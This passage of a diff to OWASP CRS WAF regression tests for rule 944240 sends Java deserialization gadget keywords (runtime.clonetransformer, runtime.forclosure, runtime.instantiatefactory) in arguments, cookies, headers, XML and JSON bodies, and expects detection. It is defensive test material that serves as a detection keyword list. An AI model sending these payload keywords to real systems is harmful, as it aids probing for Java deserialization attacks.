runtime.clonetransformer=test - 
method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944240\"" - - test_title: 944240-5 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: runtime.clonetransformer=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944240\"" + - test_id: 5 desc: "Request header test includes keyword runtime.clonetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: runtime.clonetransformer - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944240\"" - - test_title: 944240-6 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: runtime.clonetransformer + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944240\"" + - test_id: 6 desc: "XML attribute value includes keyword runtime.clonetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944240\"" - - test_title: 944240-7 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944240\"" + - test_id: 7 desc: "XML element value includes keyword runtime.clonetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "runtime.clonetransformer" - output: - log_contains: "id \"944240\"" - - test_title: 944240-8 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "runtime.clonetransformer" + output: + log_contains: "id \"944240\"" + - test_id: 8 desc: "Nested XML element value includes keyword runtime.clonetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - 
port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "runtime.clonetransformer" - output: - log_contains: "id \"944240\"" - - test_title: 944240-9 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "runtime.clonetransformer" + output: + log_contains: "id \"944240\"" + - test_id: 9 desc: "Content-Type text/plain includes keyword runtime.clonetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=runtime.clonetransformer" - output: - log_contains: "id \"944240\"" - - test_title: 944240-10 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=runtime.clonetransformer" + output: + log_contains: "id \"944240\"" + - test_id: 10 desc: 
"Content-Type application/json arg value includes keyword runtime.clonetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"runtime.clonetransformer\"}" - output: - log_contains: "id \"944240\"" - - test_title: 944240-11 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"runtime.clonetransformer\"}" + output: + log_contains: "id \"944240\"" + - test_id: 11 desc: "Content-Type application/json arg name includes keyword runtime.clonetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"runtime.clonetransformer\": \"test\"}" - output: - log_contains: "id \"944240\"" - - test_title: 944240-12 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: 
"en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"runtime.clonetransformer\": \"test\"}" + output: + log_contains: "id \"944240\"" + - test_id: 12 desc: "Argument test includes keyword runtime.forclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=runtime.forclosure" - output: - log_contains: "id \"944240\"" - - test_title: 944240-13 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=runtime.forclosure" + output: + log_contains: "id \"944240\"" + - test_id: 13 desc: "Argument name includes keyword runtime.forclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "runtime.forclosure=test" - output: - log_contains: "id \"944240\"" - - test_title: 944240-14 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "runtime.forclosure=test" + output: + log_contains: "id \"944240\"" + - test_id: 14 desc: "Cookie test includes keyword runtime.forclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=runtime.forclosure - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944240\"" - - test_title: 944240-15 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=runtime.forclosure + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944240\"" + - test_id: 15 desc: "Cookie name includes keyword runtime.forclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: runtime.forclosure=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - 
data: "test=value" - output: - log_contains: "id \"944240\"" - - test_title: 944240-16 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: runtime.forclosure=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944240\"" + - test_id: 16 desc: "Request header test includes keyword runtime.forclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: runtime.forclosure - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944240\"" - - test_title: 944240-17 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: runtime.forclosure + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944240\"" + - test_id: 17 desc: "XML attribute value includes keyword runtime.forclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944240\"" - - test_title: 944240-18 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944240\"" + - test_id: 18 desc: "XML element value includes keyword runtime.forclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "runtime.forclosure" - output: - log_contains: "id \"944240\"" - - test_title: 944240-19 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "runtime.forclosure" + output: + log_contains: "id \"944240\"" + - test_id: 19 desc: "Nested XML element value includes keyword runtime.forclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - 
Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "runtime.forclosure" - output: - log_contains: "id \"944240\"" - - test_title: 944240-20 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "runtime.forclosure" + output: + log_contains: "id \"944240\"" + - test_id: 20 desc: "Content-Type text/plain includes keyword runtime.forclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=runtime.forclosure" - output: - log_contains: "id \"944240\"" - - test_title: 944240-21 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=runtime.forclosure" + output: + log_contains: "id \"944240\"" + - test_id: 21 desc: "Content-Type application/json arg value includes keyword 
runtime.forclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"runtime.forclosure\"}" - output: - log_contains: "id \"944240\"" - - test_title: 944240-22 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"runtime.forclosure\"}" + output: + log_contains: "id \"944240\"" + - test_id: 22 desc: "Content-Type application/json arg name includes keyword runtime.forclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"runtime.forclosure\": \"test\"}" - output: - log_contains: "id \"944240\"" - - test_title: 944240-23 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: 
"HTTP/1.0" + data: "{\"runtime.forclosure\": \"test\"}" + output: + log_contains: "id \"944240\"" + - test_id: 23 desc: "Argument test includes keyword runtime.instantiatefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=runtime.instantiatefactory" - output: - log_contains: "id \"944240\"" - - test_title: 944240-24 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=runtime.instantiatefactory" + output: + log_contains: "id \"944240\"" + - test_id: 24 desc: "Argument name includes keyword runtime.instantiatefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "runtime.instantiatefactory=test" - output: - log_contains: "id \"944240\"" - - test_title: 944240-25 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "runtime.instantiatefactory=test" + output: + log_contains: "id \"944240\"" + - test_id: 25 desc: "Cookie test includes keyword runtime.instantiatefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=runtime.instantiatefactory - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944240\"" - - test_title: 944240-26 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=runtime.instantiatefactory + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944240\"" + - test_id: 26 desc: "Cookie name includes keyword runtime.instantiatefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: runtime.instantiatefactory=test - method: 
"POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944240\"" - - test_title: 944240-27 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: runtime.instantiatefactory=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944240\"" + - test_id: 27 desc: "Request header test includes keyword runtime.instantiatefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: runtime.instantiatefactory - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944240\"" - - test_title: 944240-28 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: runtime.instantiatefactory + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944240\"" + - test_id: 28 desc: "XML attribute value includes keyword runtime.instantiatefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - 
Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944240\"" - - test_title: 944240-29 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944240\"" + - test_id: 29 desc: "XML element value includes keyword runtime.instantiatefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "runtime.instantiatefactory" - output: - log_contains: "id \"944240\"" - - test_title: 944240-30 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "runtime.instantiatefactory" + output: + log_contains: "id \"944240\"" + - test_id: 30 desc: "Nested XML element value includes keyword runtime.instantiatefactory" stages: - - stage: - input: - 
dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "runtime.instantiatefactory" - output: - log_contains: "id \"944240\"" - - test_title: 944240-31 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "runtime.instantiatefactory" + output: + log_contains: "id \"944240\"" + - test_id: 31 desc: "Content-Type text/plain includes keyword runtime.instantiatefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=runtime.instantiatefactory" - output: - log_contains: "id \"944240\"" - - test_title: 944240-32 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=runtime.instantiatefactory" + output: + log_contains: "id 
